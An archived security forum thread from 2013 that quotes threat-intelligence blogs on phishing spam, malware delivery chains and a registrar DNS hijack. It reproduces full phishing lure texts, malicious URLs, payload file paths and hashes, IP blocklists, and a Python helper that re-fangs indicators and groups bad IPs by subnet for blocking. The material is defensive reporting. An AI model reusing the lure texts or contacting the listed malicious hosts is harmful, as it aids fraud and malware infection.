As seen in the email screenshot above, the malware-hosting site is hyperlinked to the legitimate UPS URL where the .PDF version of the shipping invoice can be downloaded. For users, this URL may seem safe; however, when they click the URL it leads to the downloading of the malicious ZIP file. To further convince users of its legitimacy, the recipient’s email address was created to closely resemble the actual UPS email address. The ZIP file contains a malicious file which Trend Micro detects as BKDR_VAWTRAK.A. This backdoor steals stored information in several FTP clients or file manager software. In addition, BKDR_VAWTRAK.A also steals email credentials from Outlook, PocoMail, IncrediMail, Windows Live Mail, and The Bat! among others. In order to avoid detection on the system, this backdoor deletes certain registry keys related to Software Restriction Policies... this attack was moderate in number, constituting approximately 1 in every 300-400 thousand spam on the day of the outbreak based on the estimate. To give this a baseline of comparison, the recent Royal Baby spam outbreak consisted of 1 in every 200 spam on the days of that outbreak. This email campaign also appears to be targeting specific organizations, which stresses the importance of social engineering training and how to make it effective in a workplace setting. This includes training like “social” penetration training, which is basically having someone play an attacker and attempt to lure employees via social engineering..."

:fear: :mad:

AplusWebMaster
2013-08-28, 18:06
FYI...

High Profile Domains under Siege
- http://blog.opendns.com/2013/08/27/high-profile-domains-under-siege/
August 27, 2013 - "We are actively seeing several high profile domains being -hijacked- at the DNS level and are actively blocking all requests from the apparent attackers’ name servers. The attacker looks to have compromised domain name registrar MelbourneIT. Reported domains include Share This, Twitter, Huffington Post, and the New York Times. We’re not linking to those sites for obvious reasons. The IP addresses and domains that have been involved in -redirection- have been blocked by OpenDNS... We are now blocking all requests that are coming from the known bad name servers... screenshots show the bad name server, 141.105.64.37, which is currently hosting domains including malware and phishing along with the domains affected by today’s attack..."
(Screenshots at the opendns URL above.)

- https://www.virustotal.com/en/ip-address/141.105.64.37/information/

- https://isc.sans.edu/diary.html?storyid=16451
Last Updated: 2013-08-27 21:09:58 UTC

- http://www.theregister.co.uk/2013/08/27/twitter_ny_times_in_domain_hijack/
27 August 2013

- http://arstechnica.com/security/2013/08/twitter-and-new-york-times-clash-with-hackers-for-control-of-their-sites/
Aug 27 2013, 10:10pm EST

:mad: :fear:

AplusWebMaster
2013-08-29, 15:38
FYI...

Sendori software update - malware...
- https://isc.sans.edu/diary.html?storyid=16466
Last Updated: 2013-08-29 04:27:07 UTC - "Reader Kevin wrote in to alert us of an interesting discovery regarding Sendori. Kevin stated that two of his clients were treated to malware via the auto-update system for Sendori. In particular, they had grabbed Sendori-Client-Win32/2.0.15 from 54.230.5.180 which is truly an IP attributed to Sendori via lookup results. Sendori's reputation is already a bit sketchy; search results for Sendori give immediate pause but this download in particular goes beyond the pale. With claims that "As of October 2012, Sendori has over 1,000,000 active users" this download is alarming and indicates something else is likely afoot with Sendori's site and/or updater process. The URL path (to be considered hostile) is: hxxp ://upgrade.sendori .com/upgrade/2_0_16/sendori-win-upgrader.exe...
VirusTotal results currently nine malware hits (9/46*). Malwr results** are rather damning, and as Kevin stated, Zeus-like... Other filenames for this sample as seen in the wild:
sendori-win-upgrader.exe
SendoriSetup-2.0.15.exe
update_flash_player.exe
14542884
output.14542884.txt
Update_flash_player.exe ...
Sendori replied to Kevin's notification; they are engaged and investigating:
'Hi Kevin, we have engaged our network and security team. They will analyze and take appropriate action to resolve this issue. They will contact if they need any additional information from you.
Thanks again for bringing this to our notice.
Thanks Sendori Support team' ...
Comment(1): I checked again this morning and the file sendori-win-upgrader.exe they are hosting has now changed to a smaller version with MD5 771f2382ce00d6f8378f56510fa0da43.
I was hoping that meant the Sendori folks cleaned things up but VirusTotal still throws 4 malware hits on the file, and a fresh Malwr analysis looks as evil as before. It looks like whoever is exploiting Sendori's auto-update system has just "freshened up" the file for better AV evasion. I updated my ticket with Sendori Support. My first sighting of this issue was on 2013-08-28 at 4:58pm EST when my first client was nailed with it.
Kevin Branch..."

... sendori .com/consumer_problem.html
"Sendori software works in tandem with web browsers to dramatically speed access to tens of thousands of the most popular websites..."

* https://www.virustotal.com/en/file/11bd844bbea32f6d15107373f42c7a16eee991ec1b6c205bcb4cf768d70b441d/analysis/

** https://malwr.com/analysis/Y2E4ZDlkMzQ5MjkyNDdmYjhhNjhmZDVlMDcyMjk2NGU/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake eFax Message Notification Email Messages - 2013 Aug 29
Fake Account Payment Notification Email Messages - 2013 Aug 29
Fake Purchase Order Request Email Messages - 2013 Aug 29
Fake Payment Notification Email Messages - 2013 Aug 29
Fake Payment Information Email Messages - 2013 Aug 29
Fake Shipping Information Email Messages - 2013 Aug 29
Fake Product Order Email Messages - 2013 Aug 29
Fake Account Information Request Email Messages - 2013 Aug 29
Fake Photo Sharing Email Messages - 2013 Aug 29
Fake Product Purchase Request Email Messages - 2013 Aug 29
Fake Invoice Notification Email Messages - 2013 Aug 29
Fake Payment Notification Email Messages - 2013 Aug 29
Email Messages with Malicious Attachments - 2013 Aug 29
Fake Account Deposit Notification Email Messages - 2013 Aug 29
Fake Package Delivery Failure Notification Email Messages - 2013 Aug 29
Fake Product Services Specification Request Email Messages - 2013 Aug 29
Fake Product Purchase Order Email Messages on August 28, 2013 - 2013 Aug 29
Malicious Personal Pictures Attachment Email Messages - 2013 Aug 29
Fake Scanned Document Attachment Email Messages - 2013 Aug 29
(More detail and links at the cisco URL above.)

:mad::mad: :fear:

AplusWebMaster
2013-08-30, 19:24
FYI...

Visa/PayPal Spam
- http://threattrack.tumblr.com/post/59770780239/visa-paypal-spam
Aug 30, 2013 - "Subjects Seen:
Resolution of case #PP<random>
Typical e-mail details:
Dear Visa card holder,
Our records indicate that you never responded to requests for additional information about this claim. We hope you review the attached file and solve the situation amicably.
For more details please see on the page View all details on the Usa.visa.com/personal/
Visa does not tolerate fraud or illegal activities. Your complaint has been noted in the record of the Visa card holder you reported. If we find this user has violated our policies, we will investigate and take appropriate action. If this occurs, you may be contacted in the future about the status of this complaint.
To make sure future transactions proceed smoothly, we suggest you visit the PayPal site and click the Security Center link located at the top of any page. There you will find tips on how to avoid fraudulent sellers in the “Fraud Prevention Tips for Buyers” section.

Malicious URLs
dp56148868.lolipop .jp/brassing/index.html
rossizertanna .it/occupancy/index.html
abesgrillnbar .com/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/6b4311944316d5383c145d75adb41405/tumblr_inline_msci80fxum1qz4rgp.png
___

Paychex Insurance Spam
- http://threattrack.tumblr.com/post/59780780295/paychex-insurance-spam
Aug 30, 2013 - "Subjects Seen:
Paychex Insurance Agency
Typical e-mail details:
The security of your personal information is of the utmost importance to Paychex, so we have sent the attached as a secure electronic file.
For more details please see on the page. View all details »
Note: The attached file contains encrypted data. In order to view the file, you must have already installed the decryption software that was previously provided by Paychex.
If you have any question please call us at 800-472-0072, option 4. Representatives are available to assist you Monday through Thursday between 8:00 a.m. and 8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET.
Paychex Insurance Agency

Malicious URLs
ftp(DOT)willetthofmann .com/logistically/index.html
ftp(DOT)willetthofmann .com/shadiest/index.html
abesonthego .com/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f18448ee24343c4fee8bc51c0e2416dc/tumblr_inline_mscq91NzEx1qz4rgp.png
___

Federal Reserve Suspicious Activity Spam
- http://threattrack.tumblr.com/post/59791687246/federal-reserve-suspicious-activity-spam
Aug 30, 2013 - "Subjects Seen:
FW: IMPORTANT - Suspicious Activity <random>
Typical e-mail details:
Greetings, addressing you is Ariel Howe, Superior Accounting Officer at Federal Reserve. We have received an inquiry from your Financial Institution regarding an incoming money transfer from Harvey Norman Holdings Ltd. retail with concern on the company’s current activity which is valued as “High Risk Activity”. In order to release the funds to your account please complete the attached form “IIMT Form 401”.
Please note if no further action will be taken the funds will be remain locked in the Federal Reserve System or returned to the Money transfer initiator.
Ariel Howe
Superior Accounting Officer
Office of Inspector General
c/o Board of Governors of the Federal Reserve System

Malicious File Name and MD5:
Case_<random>.zip (35C95C02EB974CA2302D2BA3EB7E5322)
Case_<date>.exe (F9A37404F1150C48AEC238BAC44977FC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3d7169caf0ef1841e4365d4763f60ab2/tumblr_inline_mscxwbY9v51qz4rgp.png

:mad::fear::sad:

AplusWebMaster
2013-09-02, 16:27
FYI...

Malware sites to block 2/9/13
- http://blog.dynamoo.com/2013/09/malware-sites-to-block-2913.html
2 Sep 2013 - "These IPs and domains are associated with this gang* and should all be considered as malicious. This list follows on from this earlier one**..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika

** http://blog.dynamoo.com/2013/08/malware-sites-to-block-19813.html
___

Fake Facebook SPAM / london-leather .com
- http://blog.dynamoo.com/2013/09/facebook-spam-london-leathercom.html
2 Sep 2013 - "This fake Facebook spam leads to malware on london-leather .com:
Date: Mon, 2 Sep 2013 19:59:52 +0300 [12:59:52 EDT]
From: Facebook [update+hiehdzge @facebookmail .com]
Subject: Victoria Carpenter commented on your status...
Hello,
Victoria Carpenter commented on your status.
Victoria wrote: "so cute"
Go to comments
Reply to this email to comment on this status.
See Comment
This message was sent to [redacted]...

In this case the link in the spam appears to use some sort of URL shortening service, first going to [donotclick]jdem .cz/5xxb8 then [donotclick]93.93.189.108 /exhortation/index.html where it attempts to load one of the following three scripts:
[donotclick]codebluesecuritynj .com/mummifies/stabbed.js
[donotclick]mobileforprofit .net/affected/liberal.js
[donotclick]tuviking .com/trillionth/began.js
These scripts in turn direct the visitor to a malicious payload site at [donotclick]london-leather .com/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 173.246.104.184 (Gandi, US) which hosts a number of malicious domains, also hijacked from GoDaddy...
Recommended blocklist:
173.246.104.184
london-leather .com
kitchenwalla .com
kidswalla .com
jerseyluggage .com
jerseycitybags .com
kiddypals .com
kennethcolenyoutlet .com
codebluesecuritynj .com
mobileforprofit .net
tuviking .com"

- https://www.virustotal.com/en/ip-address/173.246.104.184/information/
___

MONK SPAM tries to profit from WAR threat
- http://blog.dynamoo.com/2013/09/monk-spam-tries-to-profit-from-war.html
2 Sep 2013 - "The MONK (Monarchy Resources Inc) pump-and-dump spam continues*. This time though, the spammers are trying to capitalise on the threat of war in the Middle East:
From: belova04@ jeel .com
Date: 2 September 2013 17:32
Subject: This Stock just released Big News!
Are you interested in enriching yourself by means of war? It`s the very
time to do it! As soon as the first bombs get to the earth in Syria,
stone oil prices will move up the same as MONARCHY RESOURCES INC
(M-ON_K) share price. Go make money on Mon, Sep 2, 2013, get M-ON_K
shares!!!...

As previously discussed*, the stock price for this company has tanked** and is unlikely to get any better. If you attempt to do some war profiteering on this stock then you will lose out, and frankly you won't get any sympathy from me. Here are some other variants of the same scummy email:

You can make money on war!!! It`s right time to make it. The
moment the first rockets descend to Syria, oil prices will
rise the same as MONARCHY RESOURCES INC. (M O N_K) bond
price!!! Begin earning profits on Monday, September 02, 2013,
grab M O N_K shares.
It`s your turn to make money on war! It`s the very time to make it.
As soon as the first bombs touch the ground in Syria, black gold
prices will skyrocket as well as MONARCHY RESOURCES, INC (M-O-N K)
bond price. Start making money on Mon, Sep 02, 2013, get M-O-N K
shares...

* http://blog.dynamoo.com/2013/08/monk-monarchy-resources-inc-pump-and.html

** http://www.nasdaq.com/symbol/monk/interactive-chart?timeframe=1y&charttype=line

:mad: :fear::fear:

AplusWebMaster
2013-09-03, 14:23
FYI...

Fake PayPal SPAM / londonleatheronline .com
- http://blog.dynamoo.com/2013/09/paypal-spam-londonleatheronlinecom.html
3 Sep 2013 - "This fake PayPal spam leads to malware on londonleatheronline .com:
Date: Tue, 3 Sep 2013 09:43:09 +0400 [01:43:09 EDT]
From: PayPal [service@ int .paypal .com]
Subject: Identity Issue #PP-716-472-864-836
We are writing you this email in regards to your PayPal account. In accordance with our "Terms and Conditions", article 3.2., we would like to kindly ask you to confirm your identity by completing the attached form.
Please print this form and fill in the requested information. Once you have filled out all the information on the form please send it to verification@ paypal .com along with a personal identification document (identity card, driving license or international passport) and a proof of address submitted with our system ( bank account statement or utility bill ).
For more details please see on the page View all details
Your case ID for this reason is PP-U3PR33YIL8AV
For your protection, we might limit your account access. We apologize for any inconvenience this may cause.
Thanks,
PayPal ...

The link in the email goes to a legitimate -hacked- site and then loads one of these three scripts:
[donotclick]ftp.casacalderoni .com/liquids/pythias.js
[donotclick]tuviking .com/trillionth/began.js
[donotclick]walegion.comcastbiz .net/wotan/reuses.js
These scripts then try to deliver the victim to a malicious payload at [donotclick]londonleatheronline .com/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 173.246.104.184 (Gandi, US) which is the same server as used in this attack* ...
Recommended blocklist:
173.246.104.184
jerseycitybags .com
jerseyluggage .com
kennethcolenyoutlet .com
kiddypals .com
kidswalla .com
kitchenwalla .com
london-leather .com
londonleatheronline .com
ftp.casacalderoni .com
tuviking .com
walegion.comcastbiz .net "
* http://blog.dynamoo.com/2013/09/facebook-spam-london-leathercom.html

- https://www.virustotal.com/en/ip-address/173.246.104.184/information/
___

Breaking Bad Spam lurks - note pasting site
- http://www.threattracksecurity.com/it-blog/breaking-bad-spam-lurks-on-note-pasting-site/
Sep 3, 2013 - "... fresh links being dumped across a site designed to let users paste notes and images then share with their friends, in a similar manner to Pastebin... frantic posting of links galore... The site itself has Bidvertiser ads placed above and below the “watch now” graphic, which may cause end-users to think they’re related to the image. Not so – clicking the “Download” button took us to an internet speed test. Clicking the Breaking Bad image took us to a second Tumblr which is so excited about offering up ads that it ends up sliding a scroll ad right behind the survey splash.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/bbadpaste3.jpg
... They just can’t decide what they want you to click on first! Another link takes end-users to a video player install complete with various advertising related additions.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/bbadpaste4.jpg
...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/bbadpaste5.jpg
... As with all of these spam runs, you’re better off avoiding. At best, you’ll end up with some terrible grainy rip of a TV show on some free file host (after filling in a bunch of offers); at worst, you’ll end up with no TV show, unwanted installs and advert clickthroughs which lead to who-knows-where (after filling in a bunch of offers)."
___

Facebook News feed Suggestion Spam
- http://threattrack.tumblr.com/post/60178964754/facebook-news-feed-suggestion-spam
Sep 3, 2013 - "Subjects Seen:
Hi <name>, here are some Pages you may like
Typical e-mail details:
Like these Pages to get updates in your News Feed...

Malicious URLs
iecc .com .au/complying/index.html
pictondental .com .au/hilda/index.html
ladiscoteca .org/john/index.html
bonway-onza .com/thalami/index.html
watchfp .mobi/topic/able_disturb_planning.php
mvwebsites .com .au/bmSe4BN.exe
mystatesbororealestate .com/rhdkD6.exe
mit-stolz-vorbei-dollbergen .de/w8BDM.exe
petrasolutions .com/JpVsf.exe

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/70eeb14216ad4eeb475912677f4f64a4/tumblr_inline_msk090lk5B1qz4rgp.png

:mad: :fear::fear:

AplusWebMaster
2013-09-04, 14:26
FYI...

Facebook SPAM / watchfp .net
- http://blog.dynamoo.com/2013/09/facebook-spam-watchfpnet.html
4 Sep 2013 - "All this malware-laden Facebook spam is boring. Here's another one, leading to a malicious payload on watchfp .net:
Date: Tue, 3 Sep 2013 11:37:14 -0700 [14:37:14 EDT]
From: Facebook [notification+zrdohvri=vd1 @facebookmail .com]
Subject: Blake Miranda tagged 5 photos of you on Facebook
facebook
Blake Miranda added 5 photos of you.
See photos
Go to notifications
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303

Blake is pretty feminine looking for a bloke:
> https://lh3.ggpht.com/-qWsaS5oax8Y/UiZl5ycfTdI/AAAAAAAAB2M/YGE-dNgQjlo/s1600/facebook4.png
The photograph is stolen from the website of Ashot Gevorkyan [some pictures perhaps nsfw] who has quite a nice portfolio. Anyway.. the link in the email uses a shortening service:
[donotclick]u .to/r05nBA which goes to
[donotclick]www.rosenberger-kirwa .de/triassic/index.html which loads one of the following:
[donotclick]safbil .com/stashed/flout.js
[donotclick]ftp.spectrumnutrition .ca/sunscreens/copping.js
[donotclick]schornsteinfeger-helmste .de/covetously/turk.js
The final step is that the victim ends up on a malware landing page at [donotclick]watchfp .net/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 192.81.134.241 (Linode, US) along with some other hijacked domains listed in italics below. The attack is characteristic of the ThreeScripts series of malicious spam emails.
Recommended blocklist:
192.81.134.241
watchfp .org
watchfp .mobi
watchfp .net
safbil .com
ftp.spectrumnutrition .ca
schornsteinfeger-helmste .de "
___

Something evil on 174.140.168.239
- http://blog.dynamoo.com/2013/09/something-evil-on-174140168239.html
4 Sep 2013 - "The server at 174.140.168.239 (DirectSpace Networks LLC, US) is currently hosting a large number of hijacked GoDaddy domains and is being used to distribute malware [1] [2] [3].
It looks like this server has been active for a couple of months and has been used for a variety of evil purposes, I strongly recommend blocking the following:
174.140.168.239 ..."
(More listed at the dynamoo URL above.)

1) http://urlquery.net/search.php?q=174.140.168.239&type=string&start=2013-06-20&end=2013-09-04&max=400

2) https://www.virustotal.com/en-gb/ip-address/174.140.168.239/information/

3) http://blog.dynamoo.com/2013/06/hp-spam-hpscan06292013398zip-fail.html
___

Something very wrong with Gandi US (AS29169 / 173.246.96.0/20)
- http://blog.dynamoo.com/2013/09/something-is-very-wrong-with-gandi-us.html
4 Sep 2013 - "Recently I have been suggesting readers block quite a few individual IPs at Gandi in the US, but I hadn't noticed exactly how many IPs I had been suggesting until a couple of days ago. The problem seems to exist in the 173.246.96.0/20 block of AS29169 (173.246.96.0 - 173.246.111.255), a range of IP addresses that houses very many legitimate domains. Unfortunately, it also houses several malicious servers in the 173.246.102.0/24, 173.246.103.0/24 and 173.246.104.0/24 ranges, alongside legitimate sites... the warnings I have given about this IP range just in this blog alone* (ignoring all external sources)... Google prognosis**... there are a load of legitimate sites interspersed with the malware. Of course, you may want to block chunks of this IP range anyway and live with the collateral damage.. if you are hosted in this range then I suggest it is time to look for a new host. Over the past 12 months there have been at least 25 malware servers in this block, with 173.246.102.0/24 hosting 5, 173.246.103.0/24 hosting 8 and 173.246.104.0 hosting 9. Something must be seriously wrong at Gandi to allow this to happen.
Recommended blocklist:
173.246.102.2
173.246.102.202
173.246.102.223
173.246.102.250
173.246.103.47
173.246.103.191
173.246.103.232
173.246.104.52
173.246.104.55
173.246.104.104
173.246.104.128
173.246.104.154
173.246.104.184
173.246.104.185 ..."
(Long list of URLs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Gandi

** http://www.google.com/safebrowsing/diagnostic?site=AS:29169
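The blocklists quoted throughout this thread are written in the blogs' de-fanged notation ("[donotclick]", "(DOT)", "example .com", "1.2.3.4 /path"), and the Gandi post above makes the case for looking at how the bad IPs cluster per /24 before deciding whether to block a whole range and accept the collateral damage. The following Python is an added example (not code from dynamoo or from this forum) that re-fangs such entries, separates IPs from hostnames, and counts indicators per /24 so the trade-off is visible; the sample list is constructed from entries quoted on this page, and the refang rules and the threshold of 3 are assumptions for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: entries copied in the de-fanged style used in the posts above.
SAMPLE_BLOCKLIST = """
173.246.102.2
173.246.102.202
173.246.103.47
173.246.104.184
173.246.104.185
[donotclick]london-leather .com
ftp(DOT)willetthofmann .com/logistically/index.html
[donotclick]93.93.189.108 /exhortation/index.html
"""


def refang(entry: str) -> str:
    """Undo the de-fanging conventions seen in the quoted blocklists (assumed rules)."""
    s = entry.strip()
    s = re.sub(r"^\[donotclick\]", "", s)          # leading [donotclick] marker
    s = s.replace("(DOT)", ".").replace("[.]", ".")  # spelled-out dots
    s = re.sub(r"\s+\.", ".", s)                     # "example .com"  -> "example.com"
    s = re.sub(r"\.\s+", ".", s)                     # "example. com"  -> "example.com"
    s = re.sub(r"\s+/", "/", s)                      # "1.2.3.4 /path" -> "1.2.3.4/path"
    return s


def indicator_host(indicator: str) -> str:
    """Reduce a URL or host to the bare host part, lower-cased."""
    s = re.sub(r"^[a-z]+://", "", indicator, flags=re.IGNORECASE)
    return s.split("/", 1)[0].lower()


def classify(entries):
    """Split raw blocklist lines into sorted IP addresses and sorted hostnames."""
    ips, hosts = set(), set()
    for raw in entries:
        if not raw.strip():
            continue
        host = indicator_host(refang(raw))
        try:
            ips.add(ipaddress.ip_address(host))
        except ValueError:
            hosts.add(host)
    return sorted(ips), sorted(hosts)


def subnet_summary(ips, prefix: int = 24) -> dict:
    """Count indicators per enclosing subnet; keys are network strings like '173.246.102.0/24'."""
    counts = defaultdict(int)
    for ip in ips:
        net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        counts[str(net)] += 1
    return dict(counts)


def ranges_to_block(ips, prefix: int = 24, threshold: int = 3) -> list:
    """Subnets with at least `threshold` bad IPs (assumed policy) are candidates for a range block."""
    return sorted(net for net, n in subnet_summary(ips, prefix).items() if n >= threshold)


if __name__ == "__main__":
    ip_list, host_list = classify(SAMPLE_BLOCKLIST.splitlines())
    print("IPs:", [str(i) for i in ip_list])
    print("Hosts:", host_list)
    print("Per /24:", subnet_summary(ip_list))
    print("Range-block candidates:", ranges_to_block(ip_list))
```

With the sample above, 173.246.102.0/24 holds two of the listed IPs and 173.246.104.0/24 two, so at a threshold of 3 no whole /24 is nominated and only individual addresses and hostnames go into the block rules; the blog's own figures for a full year would cross that line for all three ranges.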
___

Fake PayPal SPAM / dshapovalov .info
- http://blog.dynamoo.com/2013/09/paypal-spam-dshapovalovinfo.html
4 Sep 2013 - "This fake (and badly formatted) PayPal spam email leads to malware on dshapovalov .info:
Date: Wed, 4 Sep 2013 08:33:25 -0500 [09:33:25 EDT]
From: PayPal [service@ int. paypal .com]
Subject: History of transactions #PP-011-538-446-067
ID
Transaction: { figure } {SYMBOL }
On your account malicious activity , for 1 hour was filmed around $ 100 , in small amounts In order to avoid blocking the account you need to go in. Authenticate Now
Sincerely, Services for protection
Department
PayPal does not tolerate fraud or illegal activities. Your complaint It was noted in the minutes of PayPal user you reported . If we find that This user has violated our policies , we will investigate and take appropriate action. In this case , you can contact in the future status this complaint.
To ensure that future transactions proceed smoothly, we suggest you visit PayPal site and click the Security Center link located at the top of any page. There you will find tips on how to avoid scammers " Fraud Prevention Tips for Buyers " section.
Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance , log in to your PayPal account and click the Help link in the upper right corner of any page PayPal.
Copyright © 1999-2013 PayPal. All rights reserved.
PPID PP {DIGIT } The history of monetary transactions

The link in the email goes through a URL shortening service at [donotclick]url7 .org/KRh - one annoying feature with this service is that you have to click through a form to get the link, so it isn't easy to see where you are going to land. In this case it is [donotclick]184.168.56.23 /observatories/index.html and then it runs one of the following three scripts:
[donotclick]81.143.33.169 /garrotting/rumples.js
[donotclick]northeastestateagency .co .uk/queues/relaxes.js
[donotclick]mineralmizer.webpublishpro .com/peps/dortmund.js
From there, the victim is sent to a hijacked GoDaddy domain at [donotclick]dshapovalov.info/topic/able_disturb_planning.php hosted on 192.81.134.241 (Linode, US) which is the same server used in this attack*. There are other hijacked GoDaddy domains on the same domain...
Recommended blocklist:
192.81.134.241
watchfp .org
watchfp .mobi
journeyacrossthesky .com
dshapovalov .info
watchfp .net
dshapovalov .info
mineralmizer.webpublishpro .com
northeastestateagency .co .uk
81.143.33.169 "
* http://blog.dynamoo.com/2013/09/facebook-spam-watchfpnet.html

Current PayPal related Spam Ploys
- http://threattrack.tumblr.com/post/60269257866/current-paypal-related-spam-ploys
Sep 4, 2013 - "Subjects Seen:
Resolution of case #PP-<random>
With your balance was filmed - 500 $ -Resolution of case #PP-<random>
Identity Issue #PP-<random>
History of transactions #PP-<random>
Typical e-mail details:
Resolution of Case:
Our records indicate that you never responded to requests for additional information about this claim. We hope you review the attached file and solve the situation amicably. For more details please see on the page View all details
Sincerely,
Protection Services Department ..."

Malicious URLs
ervinscarpet .com/impartially/index.html
jp-intarsia .de/concurred/index.html
hadjis-law .com/creamy/index.html
taylorandgregory .co .uk/assent/index.html
shiing01.x-y .net/stopping/index.html
fonotape.com .ar/bosun/index.html
fonotape.com .ar/supplicate/index.html
dshapovalov .info/topic/able_disturb_planning.php
dshapovalov .info/forum/viewtopic.php
petrasolutions .com/JpVsf.exe
mystatesbororealestate .com/rhdkD6.exe
mvwebsites .com .au/bmSe4BN.exe

Screenshots: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8f9dd09dcd52a551aa1a9a1d67e8035b/tumblr_inline_msltkrWOF91qz4rgp.png

- https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/268629cbc000450e262f18991b58d388/tumblr_inline_mslu2htvkm1qz4rgp.png

- https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/356a262119b3aaa8e9e4a97cd666a70e/tumblr_inline_mslu3jsH031qz4rgp.png

- https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/359086776870e0b49d03e36c88d3077d/tumblr_inline_mslu4ypOP01qz4rgp.png
___

Fake HSBC SPAM / Original Copy (Edited).zip
- http://blog.dynamoo.com/2013/09/hsbc-spam-original-copy-editedzip.html
4 Sep 2013 - "This fake HSBC spam links to a malicious ZIP file:
Date: Wed, 4 Sep 2013 01:45:17 -0700 [04:45:17 EDT]
From: HSBC Wire Advising service [wireservice@ hsbc .com .hk]
Reply-To: hsbcadviceref@ mail .com
Subject: HSBC Payment Advice Ref: [H6789000] / ACH Credits / Customer Ref: [PO780090] (Edited)
Dear Sir/Madam,
The attached payment advice is issued at the request of our customer. The advice is for your reference only.
Kindly Accept Our apology On the copy we sent earlier.
1 attachments (total 586 KB)
View slide show (1)
Download all as zip
Yours faithfully,
Global Payments and Cash Management
HSBC ...

Screenshot: https://lh3.ggpht.com/-Oj2DePefzfQ/UidKx0UPuHI/AAAAAAAAB4A/kpV1gytxjg8/s1600/hsbc.png

The link in the email goes to a file sharing site at [donotclick]ge .tt/api/1/files/1AFpS3r/0/blob?download and then downloads a file Original Copy (Edited).zip which contains a malicious executable Original Copy (Edited).scr (actually a renamed .EXE file, not a screensaver). The VirusTotal detection rate is 14/16*. The malware uses various techniques to prevent being analysed in a sandbox, but the ThreatExpert report** shows some network activity including a suspect connection to ftp.advice .yzi .me (185.28.21.26, Hostinger International US) which might be worth blocking."
* https://www.virustotal.com/en-gb/file/ea61bbf9195c4887a3f52273f0b811a96b4eb39a2956faa6e15d92afff36c09b/analysis/1378306613/

** http://www.threatexpert.com/report.aspx?md5=e7a3e70ca76f5445e898215a282488de

- https://www.virustotal.com/en/ip-address/185.28.21.26/information/

:mad: :fear:

AplusWebMaster
2013-09-05, 20:35
FYI...

More Fake Facebook SPAM / kapcotool .com
- http://blog.dynamoo.com/2013/09/facebook-spam-kapcotoolcom.html
5 Sep 2013 - "This fake Facebook spam leads to malware on kapcotool.com:
From: Facebook [no-reply@ facebook .com]
Date: 5 September 2013 15:21
Subject: Michele Murdock wants to be friends with you on Facebook.
facebook
Michele Murdock wants to be friends with you on Facebook.
University of Houston, Victoria
342 friends - 28 photos
Confirm Request ...

The -link- in the email uses an obscure URL shortening service to go first to [donotclick]fenixa .com/97855 and then to [donotclick]magic-crystal .ch/normalized/index.html, and at this point it attempts to load the following three scripts:
[donotclick]00398d0.netsolhost .com/mcguire/forgiveness.js
[donotclick]202.212.131.8 /ruses/nonsmokers.js
[donotclick]japanesevehicles .us/vector/internees.js
The final step is a malware landing page at [donotclick]kapcotool .com/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 74.207.227.154 (Linode, US) along with some other hijacked domains...
Recommended blocklist:
74.207.227.154
jgburgerlounge .ca
jngburgerjoint .ca
jngburgerjoint .com
johnmejalli .com
justcreature .com
justmonster .com
kalcodistributors .com
kapcotool .com
00398d0.netsolhost .com
japanesevehicles .us
202.212.131.8 "

- https://www.virustotal.com/en/ip-address/74.207.227.154/information/
___

NACHA SPAM / nacha-ach-processor .com
- http://blog.dynamoo.com/2013/09/nacha-spam-nacha-ach-processorcom.html
5 Sep 2013 - "This fake NACHA spam... leads to malware on nacha-ach-processor .com:
From: The Electronic Payments Association - NACHA [leansz35@ inbound .nacha .com]
Date: 5 September 2013 17:55
Subject: Rejected ACH transfer
The ACH transaction (ID: 985284643257), yesterday sent from your account (by one of your account members), was cancelled by the recipient's bank.
Cancelled transaction
ACH ID: 985284643257
Rejection Reason See additional info in the statement below
Transaction Detailed Report View Report 985284643257
About NACHA
NACHA occupies a unique role in the association world, serving as both an industry trade association and administrator of Automated Clearing House (ACH) Network. As the industry trade association that oversees the ACH Network, NACHA provides services in three key functional areas:
The NACHA Operating Rules provide the legal foundation for the exchange of ACH payments and ensure that the ACH Network remains efficient, reliable, and secure for the benefit of all participants. In its role as Network administrator, NACHA manages the rulemaking process and ensures that proposed ACH applications are consistent with the Guiding Principles of the ACH Network. The rulemaking process provides a disciplined, well-defined methodology to propose and develop and propose rules amendments to the NACHA voting membership, the decision makers for the NACHA Operating Rules.
NACHA develops and implements a comprehensive, end-to-end risk management framework that includes network entry requirements, ongoing requirements, enforcement, and ACH Operator tools and services. Collectively, the strategy addresses risk and quality in the ACH Network by minimizing unauthorized entries and customer services costs to all Network participants.
14560 Sunny Valley Drive, Suite 204
Herndon, VA 20171
© 2013 NACHA - The Electronic Payments Association

The link in the email goes through a legitimate -hacked- site and then attempts to direct visitors to [donotclick]www.nacha-ach-processor .com/news/ach-report.php (report here**) which is hosted on the following IPs:
66.230.163.86 (Goykhman And Sons LLC, US)
95.111.32.249 (Megalan / Sofia Mobiltel EAD, Bulgaria)
194.42.83.60 (Interoute Hosting, UK)
